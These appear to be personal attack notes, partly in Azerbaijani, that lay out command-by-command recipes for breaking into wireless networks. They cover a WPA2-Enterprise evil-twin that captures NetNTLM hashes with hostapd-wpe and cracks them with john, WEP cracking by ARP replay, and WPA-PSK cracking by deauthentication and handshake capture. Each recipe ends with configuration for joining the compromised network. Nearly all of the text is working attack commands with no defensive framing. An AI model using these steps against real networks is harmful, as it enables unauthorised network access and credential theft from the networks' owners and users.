Wireless attacks notes

WPA ENTERPRICE QIRMAQ

https://systemweakness.com/defeating-wpa2-enterprise-peap-authentication-418829b8922c

1.airmon-ng start wlan0

2.airodump-ng wlan0mon

3.airmon-ng stop wlan0mon

4.nano hostapd-wpe.conf

etc/hostapd-wpe/hostapd-wpe.conf den de istifade ede bilerik

5.mousepad /etc/hostapd-wpe/hostapd-wpe.eap_user -- bunu yoxluyuruq sonra

* PEAP,TTLS,TLS,FAST
"t" TTLS-PAP,TTLS-CHAP,TTLSMSCHAP,MSCHAPV2,MD5,GTC,TTLS,TTLS-MSCHAPV2 "pass" [2] [2]

6.hostapd-wpe hostapd-wpe.conf -- sonra hostapd i ise saliriq v biraz gozleyenden sonra hash-i elde edirik ve ntlm hash-i yaxalayiriq

7.john --format=netntlm --wordlist=/usr/share/john/password.lst -- rules <hash_file> john --show --format=netntlm <hash_file> -- bununla hashi qiririq

8.mousepad filename.conf -- sonra confiqurasiya faylinin icine yaziriq

network={ ssid="<ESSID>"
scan_ssid=1 key_mgmt=WPA-EAP eap=PEAP
identity="domainname\username" password="crackedpassword" phase1="peaplabel=0" phase2="auth=MSCHAPV2"
}

10.sudo wpa_supplicant -i wlan0 -c filename.conf -- ap-e qosulmaq ucun bunu basladiriq

11.dhclient -v wlan0 -- internete qosulduq !

WEP QIRMAQ

1.airmon-ng start wlan0 airodump-ng wlan0mon

2.airodump-ng -c <channel> -w filename wlan0mon

3.aireplay-ng -3 -b xx:xx:xx:xx:xx: -h xx:xx:xx:xx:xx:xx wlan0mon -- arp replay hucumu edirik

4.aircrack-ng filename.cap

5.nano filename.conf

network={ ssid="<ESSID>"
key_mgmt=NONE
wep_key0=hex key without colons and double quotes
wep_tx_keyidx=0
}

6.wpa_supplicant -i wlan0 -c filename.conf -B - ap e qosulmaq

7.dhclient -v wlan0 -- internete qosulduq!

WPA-PSK QIRMAQ

1.airmon-ng start wlan0 airodump-ng wlan0mon

2.airodump-ng -c <channel> -w filename wlan0mon

3.aireplay-ng -0 2 -a XX:XX:XX:XX:XX:XX wlan0mon

4.aircrack-ng filename.cap -w /usr/share/john/password.lst -0

5.nano filename.conf

network={ ssid="<ESSID>"
scan_ssid=1
psk="crackedpassword" key_mgmt=WPA-PSK
}

6.airmon-ng stop wlan0mon wpa_supplicant -i wlan0 -c filename.conf

7.dhclient -v wlan0 -- internete qosulduq!